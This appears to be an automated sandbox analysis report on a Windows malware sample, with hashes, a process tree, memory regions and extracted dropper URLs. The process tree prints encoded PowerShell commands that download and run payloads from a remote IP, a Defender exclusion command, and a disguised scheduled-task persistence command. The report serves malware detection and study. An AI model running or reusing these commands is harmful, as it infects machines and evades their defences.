3970a9fddbcbafb110f7d4fa7dc63ca5508ff32007d2ab2d89ffe54a3439c0b5

General

Target

file.exe
Size

35KB
MD5

a6be65f25150cadd10898e62825c5143
SHA1

c1681f9c2445ac23926e0be0fa174442160260f8
SHA256

3970a9fddbcbafb110f7d4fa7dc63ca5508ff32007d2ab2d89ffe54a3439c0b5
SHA512

838028568077561430933d2b2a4ade7b66a4861b5f36e361445c0f5f3564b767d988eac8de94a6e57f0891328d7ef4ae1dab83a47ad8df3a93fdabb8c720c033
SSDEEP

768:+FupZ04rmaAiijH46Iy4r/wOPpdwMNhghy0q9:+MLdrmaASS4kmTghy0w

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/go.png

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/me.png

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

6 556 powershell.exe
7 1068 powershell.exe
8 1444 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

NoSleep.exe

pid process

1660 NoSleep.exe
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

1068 powershell.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1876 schtasks.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid process

668 powershell.exe
1444 powershell.exe
1068 powershell.exe
556 powershell.exe
1068 powershell.exe
1068 powershell.exe
1764 conhost.exe

flow	pid	process
6	556	powershell.exe
7	1068	powershell.exe
8	1444	powershell.exe

pid	process
1660	NoSleep.exe

pid	process
1068	powershell.exe

pid	process
1876	schtasks.exe

pid	process
668	powershell.exe
1444	powershell.exe
1068	powershell.exe
556	powershell.exe
1068	powershell.exe
1068	powershell.exe
1764	conhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	1764	conhost.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

file.exepowershell.exeNoSleep.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 944 wrote to memory of 1444	944	file.exe	powershell.exe
PID 944 wrote to memory of 1444	944	file.exe	powershell.exe
PID 944 wrote to memory of 1444	944	file.exe	powershell.exe
PID 944 wrote to memory of 1068	944	file.exe	powershell.exe
PID 944 wrote to memory of 1068	944	file.exe	powershell.exe
PID 944 wrote to memory of 1068	944	file.exe	powershell.exe
PID 944 wrote to memory of 556	944	file.exe	powershell.exe
PID 944 wrote to memory of 556	944	file.exe	powershell.exe
PID 944 wrote to memory of 556	944	file.exe	powershell.exe
PID 944 wrote to memory of 668	944	file.exe	powershell.exe
PID 944 wrote to memory of 668	944	file.exe	powershell.exe
PID 944 wrote to memory of 668	944	file.exe	powershell.exe
PID 1068 wrote to memory of 1660	1068	powershell.exe	NoSleep.exe
PID 1068 wrote to memory of 1660	1068	powershell.exe	NoSleep.exe
PID 1068 wrote to memory of 1660	1068	powershell.exe	NoSleep.exe
PID 1660 wrote to memory of 1764	1660	NoSleep.exe	conhost.exe
PID 1660 wrote to memory of 1764	1660	NoSleep.exe	conhost.exe
PID 1660 wrote to memory of 1764	1660	NoSleep.exe	conhost.exe
PID 1660 wrote to memory of 1764	1660	NoSleep.exe	conhost.exe
PID 1764 wrote to memory of 1252	1764	conhost.exe	cmd.exe
PID 1764 wrote to memory of 1252	1764	conhost.exe	cmd.exe
PID 1764 wrote to memory of 1252	1764	conhost.exe	cmd.exe
PID 1764 wrote to memory of 364	1764	conhost.exe	cmd.exe
PID 1764 wrote to memory of 364	1764	conhost.exe	cmd.exe
PID 1764 wrote to memory of 364	1764	conhost.exe	cmd.exe
PID 1252 wrote to memory of 1876	1252	cmd.exe	schtasks.exe
PID 1252 wrote to memory of 1876	1252	cmd.exe	schtasks.exe
PID 1252 wrote to memory of 1876	1252	cmd.exe	schtasks.exe
PID 364 wrote to memory of 1900	364	cmd.exe	schtasks.exe
PID 364 wrote to memory of 1900	364	cmd.exe	schtasks.exe
PID 364 wrote to memory of 1900	364	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1068

C:\Users\Admin\AppData\Roaming\NoSleep.exe
"C:\Users\Admin\AppData\Roaming\NoSleep.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
5⤵
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
6⤵
- Creates scheduled task(s)
PID:1876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
- Suspicious use of WriteProcessMemory
PID:364

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
6⤵
PID:1900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b21b057e9a598986c9d216366630d2e9

SHA1
0d349921e4b9256cf42c3bca60d1ae8ee7700f84

SHA256
942e32ef82f73da4370b5f0b8ef26de08cc1cadf66693a1274fc6bc078338b8b

SHA512
8e13075bfdb792a05e04dc87b62a81273680075fcd2659710e86ba3a93901c97594e963bcc3165ad0e9f3de2f153c3b0d35de0dce41f881ea0a4333589e46e57

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b21b057e9a598986c9d216366630d2e9

SHA1
0d349921e4b9256cf42c3bca60d1ae8ee7700f84

SHA256
942e32ef82f73da4370b5f0b8ef26de08cc1cadf66693a1274fc6bc078338b8b

SHA512
8e13075bfdb792a05e04dc87b62a81273680075fcd2659710e86ba3a93901c97594e963bcc3165ad0e9f3de2f153c3b0d35de0dce41f881ea0a4333589e46e57

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
b21b057e9a598986c9d216366630d2e9

SHA1
0d349921e4b9256cf42c3bca60d1ae8ee7700f84

SHA256
942e32ef82f73da4370b5f0b8ef26de08cc1cadf66693a1274fc6bc078338b8b

SHA512
8e13075bfdb792a05e04dc87b62a81273680075fcd2659710e86ba3a93901c97594e963bcc3165ad0e9f3de2f153c3b0d35de0dce41f881ea0a4333589e46e57

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
C:\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
\Users\Admin\AppData\Roaming\NoSleep.exe
Filesize
4.4MB

MD5
da256d1a520061b14d1cd013d99e84ff

SHA1
1aad91448144852bd1bf83dcb85bd14c6db160da

SHA256
feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

SHA512
8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

Download Submit
memory/364-104-0x0000000000000000-mapping.dmp

Download
memory/556-107-0x00000000022FB000-0x000000000231A000-memory.dmp

Filesize
124KB

Download
memory/556-108-0x00000000022FB000-0x000000000231A000-memory.dmp

Filesize
124KB

Download
memory/556-86-0x00000000022FB000-0x000000000231A000-memory.dmp

Filesize
124KB

Download
memory/556-68-0x000007FEF3940000-0x000007FEF4363000-memory.dmp

Filesize
10.1MB

Download
memory/556-84-0x000000001B770000-0x000000001BA6F000-memory.dmp

Filesize
3.0MB

Download
memory/556-81-0x00000000022F4000-0x00000000022F7000-memory.dmp

Filesize
12KB

Download
memory/556-57-0x0000000000000000-mapping.dmp

Download
memory/556-75-0x00000000022F4000-0x00000000022F7000-memory.dmp

Filesize
12KB

Download
memory/556-109-0x00000000022F4000-0x00000000022F7000-memory.dmp

Filesize
12KB

Download
memory/556-71-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

Filesize
11.4MB

Download
memory/668-77-0x0000000002344000-0x0000000002347000-memory.dmp

Filesize
12KB

Download
memory/668-73-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

Filesize
11.4MB

Download
memory/668-91-0x000000000234B000-0x000000000236A000-memory.dmp

Filesize
124KB

Download
memory/668-85-0x000000001B7D0000-0x000000001BACF000-memory.dmp

Filesize
3.0MB

Download
memory/668-90-0x0000000002344000-0x0000000002347000-memory.dmp

Filesize
12KB

Download
memory/668-88-0x000000000234B000-0x000000000236A000-memory.dmp

Filesize
124KB

Download
memory/668-83-0x0000000002344000-0x0000000002347000-memory.dmp

Filesize
12KB

Download
memory/668-69-0x000007FEF3940000-0x000007FEF4363000-memory.dmp

Filesize
10.1MB

Download
memory/668-58-0x0000000000000000-mapping.dmp

Download
memory/944-54-0x0000000000B80000-0x0000000000B90000-memory.dmp

Filesize
64KB

Download
memory/1068-64-0x000007FEF3940000-0x000007FEF4363000-memory.dmp

Filesize
10.1MB

Download
memory/1068-97-0x0000000002734000-0x0000000002737000-memory.dmp

Filesize
12KB

Download
memory/1068-56-0x0000000000000000-mapping.dmp

Download
memory/1068-89-0x000000000273B000-0x000000000275A000-memory.dmp

Filesize
124KB

Download
memory/1068-82-0x0000000002734000-0x0000000002737000-memory.dmp

Filesize
12KB

Download
memory/1068-98-0x000000000273B000-0x000000000275A000-memory.dmp

Filesize
124KB

Download
memory/1068-79-0x000000001B760000-0x000000001BA5F000-memory.dmp

Filesize
3.0MB

Download
memory/1068-72-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

Filesize
11.4MB

Download
memory/1068-76-0x0000000002734000-0x0000000002737000-memory.dmp

Filesize
12KB

Download
memory/1252-102-0x0000000000000000-mapping.dmp

Download
memory/1444-78-0x000000001B750000-0x000000001BA4F000-memory.dmp

Filesize
3.0MB

Download
memory/1444-70-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

Filesize
11.4MB

Download
memory/1444-92-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/1444-80-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/1444-87-0x000000000243B000-0x000000000245A000-memory.dmp

Filesize
124KB

Download
memory/1444-55-0x0000000000000000-mapping.dmp

Download
memory/1444-59-0x000007FEFBDD1000-0x000007FEFBDD3000-memory.dmp

Filesize
8KB

Download
memory/1444-93-0x000000000243B000-0x000000000245A000-memory.dmp

Filesize
124KB

Download
memory/1444-74-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/1444-61-0x000007FEF3940000-0x000007FEF4363000-memory.dmp

Filesize
10.1MB

Download
memory/1660-95-0x0000000000000000-mapping.dmp

Download
memory/1764-101-0x000000001B5C0000-0x000000001B9F4000-memory.dmp

Filesize
4.2MB

Download
memory/1764-100-0x00000000001F0000-0x000000000064B000-memory.dmp

Filesize
4.4MB

Download
memory/1764-99-0x000000001BA20000-0x000000001BE7C000-memory.dmp

Filesize
4.4MB

Download
memory/1876-105-0x0000000000000000-mapping.dmp

Download
memory/1900-106-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads